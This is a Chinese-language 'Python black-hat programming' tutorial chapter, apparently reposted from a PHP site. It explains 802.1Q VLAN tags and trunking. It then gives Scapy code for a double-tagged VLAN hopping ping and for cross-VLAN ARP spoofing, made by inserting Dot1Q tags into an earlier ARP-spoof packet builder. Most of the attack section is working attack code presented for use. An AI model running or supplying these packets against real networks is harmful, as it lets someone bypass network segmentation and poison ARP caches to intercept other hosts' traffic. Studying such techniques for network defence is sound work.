图2

实现VLAN的方式有很多种，基于交换设备的VLAN划分，一般有两种：

l 基于交换机的端口划分

l 基于IEEE 802.1q协议，扩展以太网帧格式

基于第二层的VLAN技术，有个Trunking的概念，Trunking是用来在不同的交换机之间进行连接，以保证在跨越多个交换机上建立的同一个VLAN的成员能够相互通讯。其中交换机之间互联用的端口就称为Trunk端口。除了80.2.1q之外，思科有自己的Trunk协议叫ISL。

图3

图3是802.1q的数据包，和普通的以太网帧并没有本质的区别，只是增加一个了VLAN Tag。红色部分的VLAN Identifier标识了一个数据包属于哪个VLAN，从而保证了数据广播的范围不会跨越VLAN。

现在做简单的思考，想要跨越VLAN通信，是不是只要修改数据包中的标识符就可以了呢？

3.4.1 VLAN Hopping

基于上面的分析，我们考虑一个简单的场景：跨VLANping，从Vlan1的一个主机发送一个ping请求到Vlan2中的一个主机。

在具体编码前，我们还是要先解决VLAN数据包构造的问题，在Scapy中我们使用Dot1Q类来构造图3中的Tag部分。如图4。

图4

下面我们可以编写一个跨VLAN的ping请求了。

#!/usr/bin/python 
from scapy.all import * 
packet = Ether(dst="c0:d3:de:ad:be:ef") / 
Dot1Q(vlan=1) / 
Dot1Q(vlan=2) / 
IP(dst="192.168.13.3") / 
ICMP() 
sendp(packet)

上面的代码我们指定了目标主机的MAC和IP地址，添加了两个VLAN标识，第一个是发送数据的主机所在的VLAN，第二个是目标主机所在的VLAN。交换机会移除第一个标识，读到第二个标识的时候，会转发该数据包到目标主机。

3.4.2 跨VLAN的ARP欺骗

3.1、3.2和3.3节我们都在讨论ARP欺骗的问题，由于VLAN了广播域，我们之前的代码是无法跨VLAN进行ARP欺骗的。不过要解决这个问题也很简单，只需在我们之前构造的ARP欺骗数据中插入VLAN标识即可。下面这段代码是我们在3.1节构造ARP请求数据包的代码。

def build_req():
if options.target is None:
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0])
elif options.target:
target_mac = getmacbyip(options.target)
if target_mac is None:
print "[-] Error: Could not resolve targets MAC address"
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
return pkt

在构造数据包的部分，我们插入VLAN标识：

pkt = Ether(src=mac, dst=target_mac) /Dot1Q(vlan=our_vlan) / Dot1Q(vlan=target_vlan) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)

这样就可以实现跨VLAN的ARP欺骗了。

3.4.3 小结

本节主要讲了如何构造欺骗VLAN的数据包，达到跨VLAN数据通信和ARP欺骗的目的。需要注意的是，本文的方法主要针对802.1Q协议，对以端口进行物理隔离的的VLAN没有效果。

以上所述是小编给大家介绍的Python黑帽编程 3.4 跨越VLAN详解，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对PHP中文网的支持！

更多Python黑帽编程 3.4 跨越VLAN相关文章请关注PHP中文网！